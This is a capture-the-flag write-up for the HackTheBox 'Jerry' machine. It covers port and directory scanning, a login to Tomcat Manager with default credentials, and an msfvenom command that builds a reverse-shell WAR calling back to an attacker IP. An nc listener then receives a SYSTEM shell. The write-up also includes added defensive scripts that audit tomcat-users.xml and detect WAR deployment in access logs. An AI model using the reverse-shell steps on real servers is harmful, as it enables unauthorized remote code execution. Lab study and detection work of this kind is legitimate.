# Jerry

**Reconnaissance:**

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.95

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.95 

Not shown: 1000 open|filtered udp ports (no-response)
```

```
┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 

http://10.10.10.95:8080/aux                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs                 (Status: 302) [Size: 0] [--> /docs/]
http://10.10.10.95:8080/examples             (Status: 302) [Size: 0] [--> /examples/]
http://10.10.10.95:8080/favicon.ico          (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
http://10.10.10.95:8080/lpt1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager              (Status: 302) [Size: 0] [--> /manager/]
http://10.10.10.95:8080/nul                  (Status: 200) [Size: 0]
```

```
┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.95:8080

+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).
```

We have one port open.

* Port 8080: running Apache Tomcat/Coyote JSP engine 1.1

Before we move on to enumeration, let’s make some mental notes about the scan results.

* Port 8080 is running Apache Tomcat, and the scans found the /manager/html page, which is the login page to the Tomcat Manager application. The nikto scan identified that this page accepts the default credentials tomcat/s3cret. The Manager application exists to deploy web applications (WAR files), which by design means running code on the server, so we can simply deploy a WAR file that sends a reverse shell back to our attack machine.
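The weakness this box turns on is a deploy-capable Manager account with well-known credentials. As an added example (not part of the original writeup), the script below audits a Tomcat `tomcat-users.xml` for exactly that: accounts using default credential pairs, default-credential accounts that hold a role able to deploy applications, and accounts that combine `manager-gui` with `manager-script`, which the Tomcat manager documentation advises against. The sample XML is constructed for this example; `tomcat/s3cret` is the pair nikto reported on this box, and the other two pairs in the list are an assumption about commonly tried defaults.

```python
"""Audit a Tomcat tomcat-users.xml for default credentials and risky role grants.

Added example, not part of the original writeup. The sample file below is
constructed; only the tomcat/s3cret pair comes from the page's nikto output.
"""
import xml.etree.ElementTree as ET

DEFAULT_CREDENTIALS = {
    ("tomcat", "s3cret"),   # reported by nikto on this box
    ("tomcat", "tomcat"),   # assumption: commonly tried default pair
    ("admin", "admin"),     # assumption: commonly tried default pair
}

# Roles that allow deploying applications, i.e. running code on the server.
DEPLOY_ROLES = {"manager-gui", "manager-script", "admin-gui", "admin-script"}

# Constructed sample in the layout Tomcat ships: one account with the default
# pair and both manager roles, one account with a strong password and GUI only.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="ops" password="L0ng-Random-Passphrase!" roles="manager-gui"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, finding) tuples for every risky <user> entry.

    Finding codes:
      default-credentials                  - username/password is a known default
      deploy-role-with-default-credentials - and that account can deploy WARs
      gui-and-script-combined              - manager-gui and manager-script on
                                             the same account
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if _local(elem.tag) != "user":
            continue
        name = elem.get("username") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}

        is_default = (name, password) in DEFAULT_CREDENTIALS
        if is_default:
            findings.append((name, "default-credentials"))
        if is_default and roles & DEPLOY_ROLES:
            findings.append((name, "deploy-role-with-default-credentials"))
        if {"manager-gui", "manager-script"} <= roles:
            findings.append((name, "gui-and-script-combined"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against the real file (`conf/tomcat-users.xml` under the Tomcat install directory) by reading that file into `audit_tomcat_users`; on this box the `tomcat` account would trip all three findings.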

**Exploitation:**

Visit the /manager/html page and log in with the credentials tomcat/s3cret.

[http://10.10.10.95:8080/manager/html](http://10.10.10.95:8080/manager/html)

Generate a war file that contains a reverse shell using msfvenom.

```
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > shell.war
```

Upload the file in the Tomcat Application Manager and deploy it. Set up a listener on the attack machine.

```
┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
```

Click on the war file in the Tomcat Application Manager to execute our shell.

```
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```

We get a shell with SYSTEM privileges! That was easy! We don’t even have to escalate our privileges for this box.
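The whole chain above leaves a clear trail in the Tomcat access log: Manager requests from an address that is not an administrative host, an upload through the Manager GUI (or a deploy through the text interface), and then the first request to a context that did not exist before. As an added example (not part of the original writeup), the detector below parses access-log lines in Tomcat's common `AccessLogValve` format and raises those three alerts. The log lines are constructed for this example; the administrative network and the list of expected contexts are assumptions a deployment would set to its own values.

```python
"""Flag Manager-based WAR deployment in Tomcat access logs.

Added example, not part of the original writeup. Log lines are constructed in
the common AccessLogValve pattern: %h %l %u %t "%r" %s %b. The admin network
and the set of expected contexts are assumptions for this example.
"""
import ipaddress
import re

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager endpoints that install a new web application.
DEPLOY_ENDPOINTS = {
    ("POST", "/manager/html/upload"),   # GUI "WAR file to deploy" form
    ("PUT", "/manager/text/deploy"),    # text interface, WAR in request body
    ("GET", "/manager/text/deploy"),    # text interface, WAR from a server path
}

# Contexts expected on this server (assumption; docs/examples seen in the scans).
KNOWN_CONTEXTS = {"", "manager", "host-manager", "docs", "examples"}

# Constructed sample: an anonymous probe, a login, an upload, then the first hit
# on the new /shell context, followed by a benign request from the admin network.
SAMPLE_LOG = """\
10.10.14.3 - - [12/Jun/2018:10:15:32 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [12/Jun/2018:10:15:40 +0000] "GET /manager/html HTTP/1.1" 200 15212
10.10.14.3 - tomcat [12/Jun/2018:10:16:05 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 14976
10.10.14.3 - - [12/Jun/2018:10:16:20 +0000] "GET /shell/ HTTP/1.1" 200 0
10.10.10.50 - - [12/Jun/2018:10:17:00 +0000] "GET /docs/ HTTP/1.1" 200 19000
"""


def _in_network(host, network):
    """True if host is an IP address inside network; hostnames never match."""
    try:
        return ipaddress.ip_address(host) in network
    except ValueError:
        return False


def detect_manager_abuse(log_text, admin_net):
    """Return (host, method, path, alert) tuples, in log order.

    Alerts:
      manager-access-from-untrusted-network - any /manager request from
                                              outside admin_net
      war-deploy                            - a deploy endpoint was called
      new-context-after-deploy              - first segment of the path is
                                              not a known context and a
                                              deploy was already seen
    """
    network = ipaddress.ip_network(admin_net)
    alerts = []
    deploy_seen = False
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines not in the expected pattern
        host, method = m["host"], m["method"]
        path = m["path"].split("?", 1)[0]
        context = path.split("/", 2)[1] if path.startswith("/") else path

        if path.startswith("/manager") and not _in_network(host, network):
            alerts.append((host, method, path, "manager-access-from-untrusted-network"))
        if (method, path) in DEPLOY_ENDPOINTS:
            alerts.append((host, method, path, "war-deploy"))
            deploy_seen = True
        elif deploy_seen and context not in KNOWN_CONTEXTS:
            alerts.append((host, method, path, "new-context-after-deploy"))
    return alerts


if __name__ == "__main__":
    for host, method, path, alert in detect_manager_abuse(SAMPLE_LOG, "10.10.10.0/24"):
        print(f"{alert:40} {host} {method} {path}")
```

On a real host the same three alerts, taken together, are the signal to look for; the follow-up is to restrict the Manager application to administrative addresses (Tomcat's `RemoteAddrValve` serves that purpose), replace the default account, and run Tomcat under a low-privilege service account rather than SYSTEM, which is what made privilege escalation unnecessary on this box.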

```
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt
user.txt
7004-----------------------------

root.txt
04a8b3-----------------------------
```